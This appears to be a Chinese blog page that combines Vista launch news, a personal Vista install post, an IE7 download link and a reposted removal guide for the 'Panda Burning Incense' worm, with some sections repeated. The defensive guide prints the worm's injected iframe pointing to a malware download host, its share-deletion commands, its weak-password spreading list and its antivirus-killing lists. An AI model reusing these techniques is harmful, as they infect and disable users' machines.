微软公司耗时多年开发完成的新一代操作系统 Windows Vista 在2007年1月30日正式面向全球消费者发售了。29日下午,微软在世界的中心——纽约时代广场举行了盛大的发布活动,时代广场成为了 Vista 的海洋。
无论你是否喜欢 Windows Vista,是否使用它,它都会在今后十年中或多或少对地球上数十亿人口的生产和生活有关联,它的发布都是会记入历史的。因此,全世界媒体都对其发布进行了报道。
官方提供的纽约发布会现场视频:
(大小351140KB,时长55:16,比特率491Kbps,分辨率320 x 180,画面比例16:9)
[wmv]mms://wm.microsoft.com/ms/msnse/0701/29339/GA_Launch_MBR.wmv[/wmv]
文件太大了!~不能用CC发,只好用WMP了!~
无论你是否喜欢 Windows Vista,是否使用它,它都会在今后十年中或多或少对地球上数十亿人口的生产和生活有关联,它的发布都是会记入历史的。因此,全世界媒体都对其发布进行了报道。
官方提供的纽约发布会现场视频:
(大小351140KB,时长55:16,比特率491Kbps,分辨率320 x 180,画面比例16:9)
[wmv]mms://wm.microsoft.com/ms/msnse/0701/29339/GA_Launch_MBR.wmv[/wmv]
文件太大了!~不能用CC发,只好用WMP了!~
出处:PConline原地址:http://www.pconline.com.cn/pcedu/soft/virus/safe/0701/942893.html
编者按:本文介绍了熊猫烧香病毒、熊猫烧香病毒变种的查杀方法,及熊猫烧香病毒的手动清除方案。提供了病毒进程为spoclsv.exe和FuckJacks.exe变种的解决方案,和熊猫烧香病毒专杀工具。
在动手查杀熊猫烧香病毒之前,强烈建议先注意以下四点:
1.本文包含两种熊猫烧香病毒变种的描述,请注意查看病毒症状,根据实际情况选用不同的查杀方法。
2.对于被熊猫烧香病毒感染的.exe可执行文件,推荐先备份,再修复!
3.找回被熊猫烧香病毒删除的ghost(.gho)文件,请使用EasyRecovery Pro。.gho文件所在分区进行的写操作越少,找回来的几率越大。
4.对计算机了解不多的用户,请在专家指导下清除熊猫烧香病毒。
熊猫烧香病毒变种一:病毒进程为“spoclsv.exe”
这是“熊猫烧香”早期变种之一,特别之处是“杀死杀毒软件”,最恶劣之处在于感染全盘.exe文件和删除.gho文件(Ghost的镜像文件)。
最有“灵感”的一招莫过于在所有htm/html/asp/php/jsp/aspx文件末尾添加一段代码来调用病毒。目前所有专杀工具及杀毒软件均不会修复此病毒行为。需要手动清除病毒添加的代码,且一定要清除。否则访问了有此代码的网页,又会感染。
其他老一点的“熊猫烧香”spoclsv变种的病毒行为比此版本少。就不再单独列出。
病毒描述:
“武汉男生”,俗称“熊猫烧香”,这是一个感染型的蠕虫病毒,它能感染系统中exe,com,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件,(.gho为GHOST的备份文件),使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。
熊猫烧香病毒(非原图)
被感染的程序(实际图)
以下是熊猫烧香病毒详细行为和解决办法:
熊猫烧香病毒详细行为:
1.复制自身到系统目录下:
%System%driversspoclsv.exe(“%System%”代表Windows所在目录,比如:C:Windows)
不同的spoclsv.exe变种,此目录可不同。比如12月爆发的变种目录是:C:WINDOWSSystem32Driversspoclsv.exe。
2.创建启动项:
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]
"svcshare"="%System%driversspoclsv.exe"
3.在各分区根目录生成病毒副本:
X:setup.exe
X:autorun.inf
autorun.inf内容:
[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shellAutocommand=setup.exe
4.使用net share命令关闭管理共享:
cmd.exe /c net share X$ /del /y
cmd.exe /c net share admin$ /del /y
5.修改“显示所有文件和文件夹”设置:
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion
ExplorerAdvancedFolderHiddenSHOWALL]
"CheckedValue"=dword:00000000
6.熊猫烧香病毒尝试关闭安全软件相关窗口:
天网
防火墙
进程
VirusScan
NOD32
网镖
杀毒
毒霸
瑞星
江民
黄山IE
超级兔子
优化大师
木马清道夫
木馬清道夫
QQ病毒
注册表编辑器
系统配置实用程序
卡巴斯基反病毒
Symantec AntiVirus
Duba
Windows 任务管理器
esteem procs
绿鹰PC
密码防盗
噬菌体
木马辅助查找器
System Safety Monitor
Wrapped gift Killer
Winsock Expert
游戏木马检测大师
超级巡警
msctls_statusbar32
pjf(ustc)
IceSword
7.尝试结束安全软件相关进程以及Viking病毒(威金病毒)进程:
Mcshield.exe
VsTskMgr.exe
naPrdMgr.exe
UpdaterUI.exe
TBMon.exe
scan32.exe
Ravmond.exe
CCenter.exe
RavTask.exe
Rav.exe
Ravmon.exe
RavmonD.exe
RavStub.exe
KVXP.kxp
KvMonXP.kxp
KVCenter.kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
TrojDie.kxp
FrogAgent.exe
Logo1_.exe
Logo_1.exe
Rundl132.exe
8.禁用安全软件相关服务:
Schedule
sharedaccess
RsCCenter
RsRavMon
KVWSC
KVSrvXP
kavsvc
AVP
McAfeeFramework
McShield
McTaskManager
navapsvc
wscsvc
KPfwSvc
SNDSrvc
ccProxy
ccEvtMgr
ccSetMgr
SPBBCSvc
Symantec Core LC
NPFMntor
MskService
FireSvc
9.删除安全软件相关启动项:
SOFTWAREMicrosoftWindowsCurrentVersionRunRavTask
SOFTWAREMicrosoftWindowsCurrentVersionRunKvMonXP
SOFTWAREMicrosoftWindowsCurrentVersionRunkav
SOFTWAREMicrosoftWindowsCurrentVersionRunKAVPersonal50
SOFTWAREMicrosoftWindowsCurrentVersionRunMcAfeeUpdaterUI
SOFTWAREMicrosoftWindowsCurrentVersionRunNetwork Associates Error Reporting Service
SOFTWAREMicrosoftWindowsCurrentVersionRunShStatEXE
SOFTWAREMicrosoftWindowsCurrentVersionRunYLive.exe
SOFTWAREMicrosoftWindowsCurrentVersionRunyassistse
10.遍历目录修改htm/html/asp/php/jsp/aspx等网页文件,在这些文件尾部追加信息:
<iframe src="hxxp://www.ctv163.com/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe>
但不修改以下目录中的网页文件:
C:WINDOWS
C:WINNT
C:system32
C:Documents and Settings
C:System Volume Information
C:Recycled
Program FilesWindows NT
Program FilesWindowsUpdate
Program FilesWindows Media Player
Program FilesOutlook Express
Program FilesInternet Explorer
Program FilesNetMeeting
Program FilesCommon Files
Program FilesComPlus Applications
Program FilesMessenger
Program FilesInstallShield Installation Information
Program FilesMSN
Program FilesMicrosoft Frontpage
Program FilesMovie Maker
Program FilesMSN Gamin Zone
11.在访问过的目录下生成Desktop_.ini文件,内容为当前日期。
12.此外,病毒还会尝试删除GHO文件。
病毒还尝试使用弱密码将副本以GameSetup.exe的文件名复制到局域网内其它计算机中:
password
harley
golf
pussy
mustang
shadow
fish
qwerty
baseball
letmein
ccc
admin
abc
pass
passwd
database
abcd
abc123
sybase
123qwe
server
computer
super
123asd
ihavenopass
godblessyou
enable
alpha
1234qwer
123abc
aaa
patrick
pat
administrator
root
sex
god
fuckyou
fuck
test
test123
temp
temp123
win
asdf
pwd
qwer
yxcv
zxcv
home
xxx
owner
login
Login
love
mypc
mypc123
admin123
mypass
mypass123
Administrator
Guest
admin
Root
病毒文件内含有这些信息:
whboy
***武*汉*男*生*感*染*下*载*者***
解决方案:
1. 结束病毒进程:
%System%driversspoclsv.exe
不同的spoclsv.exe变种,此目录可不同。比如12月爆发的变种目录是:C:WINDOWSSystem32Driversspoclsv.exe。但可用此方法清除。
“%System%system32spoclsv.exe”是系统文件。(目前看来没有出现插入该系统进程的变种,不排除变种的手法变化。)
查看当前运行spoclsv.exe的路径,可使用超级兔子魔法设置。
2. 删除病毒文件:
%System%driversspoclsv.exe
请注意区分病毒和系统文件。详见步骤1。
3. 删除病毒启动项:
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]
"svcshare"="%System%driversspoclsv.exe"
4. 通过分区盘符右键菜单中的“打开”进入分区根目录,删除根目录下的病毒文件:
X:setup.exe
X:autorun.inf
5. 恢复被修改的“显示所有文件和文件夹”设置:
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion
ExplorerAdvancedFolderHiddenSHOWALL]
"CheckedValue"=dword:00000001
6. 修复或重新安装被破坏的安全软件。
7. 修复被感染的程序。可用专杀工具进行修复,收集了四个供读者使用。金山熊猫烧香病毒专杀工具、安天熊猫烧香病毒专杀工具、江民熊猫烧香病毒专杀工具和瑞星熊猫烧香病毒专杀工具。也可用手动方法(见本文末)。
8. 恢复被修改的网页文件,可以使用某些编辑网页的工具替换被添加文字为空。机器上有htm/html/asp/php/jsp/aspx等网页文件,一定要删除此段代码。有危险代码的网页一但发布到网页可能会感染其他用户。
熊猫烧香病毒变种二:病毒进程为“FuckJacks.exe”
以下是数据安全实验室提供的信息与方法。
病毒描述:
含有病毒体的文件被运行后,病毒将自身拷贝至系统目录,同时修改注册表将自身设置为开机启动项,并遍历各个驱动器,将自身写入磁盘根目录下,增加一个Autorun.inf文件,使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染,同时开另外一个线程连接某网站下载ddos程序进行发动恶意攻击。
病毒基本情况:
[文件信息]
病毒名: Virus.Win32.EvilPanda.a.ex$
大小: 0xDA00 (55808), (disk) 0xDA00 (55808)
SHA1 : F0C3DA82E1620701AD2F0C8B531EEBEA0E8AF69D
壳信息: 未知
危害级别:高
病毒名: Flooder.Win32.FloodBots.a.ex$
大 小: 0xE800 (59392), (disk) 0xE800 (59392)
SHA1 : B71A7EF22A36DBE27E3830888DAFC3B2A7D5DA0D
壳信息: UPX 0.89.6 - 1.02 / 1.05 - 1.24
危害级别:高
病毒行为:
Virus.Win32.EvilPanda.a.ex$ :
1、病毒体执行后,将自身拷贝到系统目录:
%SystemRoot%system32FuckJacks.exe
2、添加注册表启动项目确保自身在系统重启动后被加载:
键路径:HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun
键名:FuckJacks
键值:"C:WINDOWSsystem32FuckJacks.exe"
键路径:HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
键名:svohost
键值:"C:WINDOWSsystem32FuckJacks.exe"
3、拷贝自身到所有驱动器根目录,命名为Setup.exe,并生成一个autorun.inf使得用户打开该盘运行病毒,并将这两个文件属性设置为隐藏、只读、系统。
C:autorun.inf 1KB RHS
C:setup.exe 230KB RHS
4、关闭众多杀毒软件和安全工具。
5、连接*****.3322.org下载某文件,并根据该文件记录的地址,去www.****.com下载某ddos程序,下载成功后执行该程序。
6、刷新bbs.qq.com,某QQ秀链接。
7、循环遍历磁盘目录,感染文件,对关键系统文件跳过,不感染Windows媒体播放器、MSN、IE 等程序。
Flooder.Win32.FloodBots.a.ex$ :
1、病毒体执行后,将自身拷贝到系统目录:
%SystemRoot%SVCH0ST.EXE(注意文件名中的“0”是数字“零”,不是字母“o”)
%SystemRoot%system32SVCH0ST.EXE(注意文件名中的“0”是数字“零”,不是字母“o”)
2、该病毒后下载运行后,添加注册表启动项目确保自身在系统重启动后被加载:
键路径:HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
键名:Userinit
键值:"C:WINDOWSsystem32SVCH0ST.exe"
3、连接ddos2.****.com,获取攻击地址列表和攻击配置,并根据配置文件,进行相应的攻击。
配置文件如下:
www。victim.net:3389
www。victim.net:80
www。victim.com:80
www。victim.net:80
1
1
120
50000
解决方案:
1. 断开网络
2. 结束病毒进程:%System%FuckJacks.exe
3. 删除病毒文件:%System%FuckJacks.exe
4. 右键点击分区盘符,点击右键菜单中的“打开”进入分区根目录,删除根目录下的文件:
X:autorun.inf
X:setup.exe
5. 删除病毒创建的启动项:
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]
"FuckJacks"="%System%FuckJacks.exe"
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"svohost"="%System%FuckJacks.exe"
6. 修复或重新安装反病毒软件
7. 使用反病毒软件或专杀工具进行全盘扫描,清除恢复被感染的exe文件。也可用以下的手动方法恢复文件。
手动恢复中毒文件(在虚拟机上通过测试,供参考)
1.在清除病毒文件的同时不删除%SYSTEM%下面释放FuckJacks.exe的这个文件,即执行之前的步骤1、2、4、5。
2.打开“运行”输入“gpedit.msc”打开组策略-本地计算机策略-windows设置-安全设置-软件限制策略-其它规则。在其它规则上右键选择-新散列规则-打开新散列规则窗口
3.在文件散列上点击浏览找到%SYSTEM%下面释放FuckJacks.exe文件。安全级别选择-不允许的。确定后重启。
4.重启后可以双击运行已经被熊猫感染的程序。运行程序后该FuckJacks.exe文件会在注册表里的Run键下建立启动项(不会有问题的)。
5.双击运行被感染的程序已经恢复原来样子了。全部回复后,用SREng把FuckJacks.exe在注册表里的启动项删除即可!
编者按:本文介绍了熊猫烧香病毒、熊猫烧香病毒变种的查杀方法,及熊猫烧香病毒的手动清除方案。提供了病毒进程为spoclsv.exe和FuckJacks.exe变种的解决方案,和熊猫烧香病毒专杀工具。
在动手查杀熊猫烧香病毒之前,强烈建议先注意以下四点:
1.本文包含两种熊猫烧香病毒变种的描述,请注意查看病毒症状,根据实际情况选用不同的查杀方法。
2.对于被熊猫烧香病毒感染的.exe可执行文件,推荐先备份,再修复!
3.找回被熊猫烧香病毒删除的ghost(.gho)文件,请使用EasyRecovery Pro。.gho文件所在分区进行的写操作越少,找回来的几率越大。
4.对计算机了解不多的用户,请在专家指导下清除熊猫烧香病毒。
熊猫烧香病毒变种一:病毒进程为“spoclsv.exe”
这是“熊猫烧香”早期变种之一,特别之处是“杀死杀毒软件”,最恶劣之处在于感染全盘.exe文件和删除.gho文件(Ghost的镜像文件)。
最有“灵感”的一招莫过于在所有htm/html/asp/php/jsp/aspx文件末尾添加一段代码来调用病毒。目前所有专杀工具及杀毒软件均不会修复此病毒行为。需要手动清除病毒添加的代码,且一定要清除。否则访问了有此代码的网页,又会感染。
其他老一点的“熊猫烧香”spoclsv变种的病毒行为比此版本少。就不再单独列出。
病毒描述:
“武汉男生”,俗称“熊猫烧香”,这是一个感染型的蠕虫病毒,它能感染系统中exe,com,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件,(.gho为GHOST的备份文件),使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。
熊猫烧香病毒(非原图)
被感染的程序(实际图)
以下是熊猫烧香病毒详细行为和解决办法:
熊猫烧香病毒详细行为:
1.复制自身到系统目录下:
%System%driversspoclsv.exe(“%System%”代表Windows所在目录,比如:C:Windows)
不同的spoclsv.exe变种,此目录可不同。比如12月爆发的变种目录是:C:WINDOWSSystem32Driversspoclsv.exe。
2.创建启动项:
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]
"svcshare"="%System%driversspoclsv.exe"
3.在各分区根目录生成病毒副本:
X:setup.exe
X:autorun.inf
autorun.inf内容:
[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shellAutocommand=setup.exe
4.使用net share命令关闭管理共享:
cmd.exe /c net share X$ /del /y
cmd.exe /c net share admin$ /del /y
5.修改“显示所有文件和文件夹”设置:
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion
ExplorerAdvancedFolderHiddenSHOWALL]
"CheckedValue"=dword:00000000
6.熊猫烧香病毒尝试关闭安全软件相关窗口:
天网
防火墙
进程
VirusScan
NOD32
网镖
杀毒
毒霸
瑞星
江民
黄山IE
超级兔子
优化大师
木马清道夫
木馬清道夫
QQ病毒
注册表编辑器
系统配置实用程序
卡巴斯基反病毒
Symantec AntiVirus
Duba
Windows 任务管理器
esteem procs
绿鹰PC
密码防盗
噬菌体
木马辅助查找器
System Safety Monitor
Wrapped gift Killer
Winsock Expert
游戏木马检测大师
超级巡警
msctls_statusbar32
pjf(ustc)
IceSword
7.尝试结束安全软件相关进程以及Viking病毒(威金病毒)进程:
Mcshield.exe
VsTskMgr.exe
naPrdMgr.exe
UpdaterUI.exe
TBMon.exe
scan32.exe
Ravmond.exe
CCenter.exe
RavTask.exe
Rav.exe
Ravmon.exe
RavmonD.exe
RavStub.exe
KVXP.kxp
KvMonXP.kxp
KVCenter.kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
TrojDie.kxp
FrogAgent.exe
Logo1_.exe
Logo_1.exe
Rundl132.exe
8.禁用安全软件相关服务:
Schedule
sharedaccess
RsCCenter
RsRavMon
KVWSC
KVSrvXP
kavsvc
AVP
McAfeeFramework
McShield
McTaskManager
navapsvc
wscsvc
KPfwSvc
SNDSrvc
ccProxy
ccEvtMgr
ccSetMgr
SPBBCSvc
Symantec Core LC
NPFMntor
MskService
FireSvc
9.删除安全软件相关启动项:
SOFTWAREMicrosoftWindowsCurrentVersionRunRavTask
SOFTWAREMicrosoftWindowsCurrentVersionRunKvMonXP
SOFTWAREMicrosoftWindowsCurrentVersionRunkav
SOFTWAREMicrosoftWindowsCurrentVersionRunKAVPersonal50
SOFTWAREMicrosoftWindowsCurrentVersionRunMcAfeeUpdaterUI
SOFTWAREMicrosoftWindowsCurrentVersionRunNetwork Associates Error Reporting Service
SOFTWAREMicrosoftWindowsCurrentVersionRunShStatEXE
SOFTWAREMicrosoftWindowsCurrentVersionRunYLive.exe
SOFTWAREMicrosoftWindowsCurrentVersionRunyassistse
10.遍历目录修改htm/html/asp/php/jsp/aspx等网页文件,在这些文件尾部追加信息:
<iframe src="hxxp://www.ctv163.com/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe>
但不修改以下目录中的网页文件:
C:WINDOWS
C:WINNT
C:system32
C:Documents and Settings
C:System Volume Information
C:Recycled
Program FilesWindows NT
Program FilesWindowsUpdate
Program FilesWindows Media Player
Program FilesOutlook Express
Program FilesInternet Explorer
Program FilesNetMeeting
Program FilesCommon Files
Program FilesComPlus Applications
Program FilesMessenger
Program FilesInstallShield Installation Information
Program FilesMSN
Program FilesMicrosoft Frontpage
Program FilesMovie Maker
Program FilesMSN Gamin Zone
11.在访问过的目录下生成Desktop_.ini文件,内容为当前日期。
12.此外,病毒还会尝试删除GHO文件。
病毒还尝试使用弱密码将副本以GameSetup.exe的文件名复制到局域网内其它计算机中:
password
harley
golf
pussy
mustang
shadow
fish
qwerty
baseball
letmein
ccc
admin
abc
pass
passwd
database
abcd
abc123
sybase
123qwe
server
computer
super
123asd
ihavenopass
godblessyou
enable
alpha
1234qwer
123abc
aaa
patrick
pat
administrator
root
sex
god
fuckyou
fuck
test
test123
temp
temp123
win
asdf
pwd
qwer
yxcv
zxcv
home
xxx
owner
login
Login
love
mypc
mypc123
admin123
mypass
mypass123
Administrator
Guest
admin
Root
病毒文件内含有这些信息:
whboy
***武*汉*男*生*感*染*下*载*者***
解决方案:
1. 结束病毒进程:
%System%driversspoclsv.exe
不同的spoclsv.exe变种,此目录可不同。比如12月爆发的变种目录是:C:WINDOWSSystem32Driversspoclsv.exe。但可用此方法清除。
“%System%system32spoclsv.exe”是系统文件。(目前看来没有出现插入该系统进程的变种,不排除变种的手法变化。)
查看当前运行spoclsv.exe的路径,可使用超级兔子魔法设置。
2. 删除病毒文件:
%System%driversspoclsv.exe
请注意区分病毒和系统文件。详见步骤1。
3. 删除病毒启动项:
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]
"svcshare"="%System%driversspoclsv.exe"
4. 通过分区盘符右键菜单中的“打开”进入分区根目录,删除根目录下的病毒文件:
X:setup.exe
X:autorun.inf
5. 恢复被修改的“显示所有文件和文件夹”设置:
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion
ExplorerAdvancedFolderHiddenSHOWALL]
"CheckedValue"=dword:00000001
6. 修复或重新安装被破坏的安全软件。
7. 修复被感染的程序。可用专杀工具进行修复,收集了四个供读者使用。金山熊猫烧香病毒专杀工具、安天熊猫烧香病毒专杀工具、江民熊猫烧香病毒专杀工具和瑞星熊猫烧香病毒专杀工具。也可用手动方法(见本文末)。
8. 恢复被修改的网页文件,可以使用某些编辑网页的工具替换被添加文字为空。机器上有htm/html/asp/php/jsp/aspx等网页文件,一定要删除此段代码。有危险代码的网页一但发布到网页可能会感染其他用户。
熊猫烧香病毒变种二:病毒进程为“FuckJacks.exe”
以下是数据安全实验室提供的信息与方法。
病毒描述:
含有病毒体的文件被运行后,病毒将自身拷贝至系统目录,同时修改注册表将自身设置为开机启动项,并遍历各个驱动器,将自身写入磁盘根目录下,增加一个Autorun.inf文件,使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染,同时开另外一个线程连接某网站下载ddos程序进行发动恶意攻击。
病毒基本情况:
[文件信息]
病毒名: Virus.Win32.EvilPanda.a.ex$
大小: 0xDA00 (55808), (disk) 0xDA00 (55808)
SHA1 : F0C3DA82E1620701AD2F0C8B531EEBEA0E8AF69D
壳信息: 未知
危害级别:高
病毒名: Flooder.Win32.FloodBots.a.ex$
大 小: 0xE800 (59392), (disk) 0xE800 (59392)
SHA1 : B71A7EF22A36DBE27E3830888DAFC3B2A7D5DA0D
壳信息: UPX 0.89.6 - 1.02 / 1.05 - 1.24
危害级别:高
病毒行为:
Virus.Win32.EvilPanda.a.ex$ :
1、病毒体执行后,将自身拷贝到系统目录:
%SystemRoot%system32FuckJacks.exe
2、添加注册表启动项目确保自身在系统重启动后被加载:
键路径:HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun
键名:FuckJacks
键值:"C:WINDOWSsystem32FuckJacks.exe"
键路径:HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
键名:svohost
键值:"C:WINDOWSsystem32FuckJacks.exe"
3、拷贝自身到所有驱动器根目录,命名为Setup.exe,并生成一个autorun.inf使得用户打开该盘运行病毒,并将这两个文件属性设置为隐藏、只读、系统。
C:autorun.inf 1KB RHS
C:setup.exe 230KB RHS
4、关闭众多杀毒软件和安全工具。
5、连接*****.3322.org下载某文件,并根据该文件记录的地址,去www.****.com下载某ddos程序,下载成功后执行该程序。
6、刷新bbs.qq.com,某QQ秀链接。
7、循环遍历磁盘目录,感染文件,对关键系统文件跳过,不感染Windows媒体播放器、MSN、IE 等程序。
Flooder.Win32.FloodBots.a.ex$ :
1、病毒体执行后,将自身拷贝到系统目录:
%SystemRoot%SVCH0ST.EXE(注意文件名中的“0”是数字“零”,不是字母“o”)
%SystemRoot%system32SVCH0ST.EXE(注意文件名中的“0”是数字“零”,不是字母“o”)
2、该病毒后下载运行后,添加注册表启动项目确保自身在系统重启动后被加载:
键路径:HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
键名:Userinit
键值:"C:WINDOWSsystem32SVCH0ST.exe"
3、连接ddos2.****.com,获取攻击地址列表和攻击配置,并根据配置文件,进行相应的攻击。
配置文件如下:
www。victim.net:3389
www。victim.net:80
www。victim.com:80
www。victim.net:80
1
1
120
50000
解决方案:
1. 断开网络
2. 结束病毒进程:%System%FuckJacks.exe
3. 删除病毒文件:%System%FuckJacks.exe
4. 右键点击分区盘符,点击右键菜单中的“打开”进入分区根目录,删除根目录下的文件:
X:autorun.inf
X:setup.exe
5. 删除病毒创建的启动项:
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]
"FuckJacks"="%System%FuckJacks.exe"
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"svohost"="%System%FuckJacks.exe"
6. 修复或重新安装反病毒软件
7. 使用反病毒软件或专杀工具进行全盘扫描,清除恢复被感染的exe文件。也可用以下的手动方法恢复文件。
手动恢复中毒文件(在虚拟机上通过测试,供参考)
1.在清除病毒文件的同时不删除%SYSTEM%下面释放FuckJacks.exe的这个文件,即执行之前的步骤1、2、4、5。
2.打开“运行”输入“gpedit.msc”打开组策略-本地计算机策略-windows设置-安全设置-软件限制策略-其它规则。在其它规则上右键选择-新散列规则-打开新散列规则窗口
3.在文件散列上点击浏览找到%SYSTEM%下面释放FuckJacks.exe文件。安全级别选择-不允许的。确定后重启。
4.重启后可以双击运行已经被熊猫感染的程序。运行程序后该FuckJacks.exe文件会在注册表里的Run键下建立启动项(不会有问题的)。
5.双击运行被感染的程序已经恢复原来样子了。全部回复后,用SREng把FuckJacks.exe在注册表里的启动项删除即可!
昨天晚上无聊,便试着装了微软的新系统Vista,
感觉还是有点不习惯,装之前下好了兼容VISTA的系统驱动.
由于学校的二次拨号太烂了在VISTA下根本没用.所以没有体验到上网.
今天先发几张截图出来,嘿嘿!~
系统显卡是集成的,所以硬件评分只打了2.0.准备过完年再买内存和显卡吧.
微软将在今日向客户公布IE7的最终正式版,并预计于11月1日通过自动更新推送IE7.目前我们已经拿到了地址,微软的比利时官方站提供了以下链接.为了方便起见直接发布出了上述链接.同时,Yahoo版的IE7提取出来以后的数字签名和官方版完全相同.
下载:http://download.microsoft.com/download/3/8/8/38889DC1-848C-4BF2-8335-86C573AD86D9/IE7-WindowsXP-x86-enu.exe
下载:http://download.microsoft.com/download/3/8/8/38889DC1-848C-4BF2-8335-86C573AD86D9/IE7-WindowsXP-x86-enu.exe
